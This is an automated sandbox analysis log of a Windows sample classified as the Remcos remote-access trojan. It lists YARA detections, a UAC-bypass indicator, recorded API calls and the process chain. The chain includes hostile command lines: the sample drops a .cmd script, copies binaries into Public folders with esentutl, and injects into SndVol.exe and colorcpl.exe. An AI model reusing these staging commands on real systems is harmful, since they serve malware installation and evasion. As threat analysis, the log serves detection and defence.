Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@18/8@14/3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 8_2_2914798D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 15_2_0041798D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077E86AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 15_2_077E86AA
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C57FD4 GetDiskFreeSpaceA, 0_2_02C57FD4
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6AD98 CreateToolhelp32Snapshot, 0_2_02C6AD98
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C66DC8 CoCreateInstance, 0_2_02C66DC8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914B539 FindResourceA,LoadResource,LockResource,SizeofResource, 8_2_2914B539
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_2914AB9E
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe File created: C:\Users\Public\Libraries\PNO Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\SysWOW64\SndVol.exe Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\SysWOW64\SndVol.exe Mutant created: \Sessions\1\BaseNamedObjects\Resignation-X9RTX9
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: jlPBMMQbXC.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe File read: C:\Users\user\Desktop\jlPBMMQbXC.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\jlPBMMQbXC.exe "C:\Users\user\Desktop\jlPBMMQbXC.exe"
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hizbeleS.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jlPBMMQbXC.exe /d C:\\Users\\Public\\Libraries\\Selebzih.PIF /o
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\Public\Libraries\Selebzih.PIF "C:\Users\Public\Libraries\Selebzih.PIF"
Source: C:\Users\Public\Libraries\Selebzih.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: unknown Process created: C:\Users\Public\Libraries\Selebzih.PIF "C:\Users\Public\Libraries\Selebzih.PIF"
Source: C:\Users\Public\Libraries\Selebzih.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hizbeleS.cmd" " Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jlPBMMQbXC.exe /d C:\\Users\\Public\\Libraries\\Selebzih.PIF /o Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
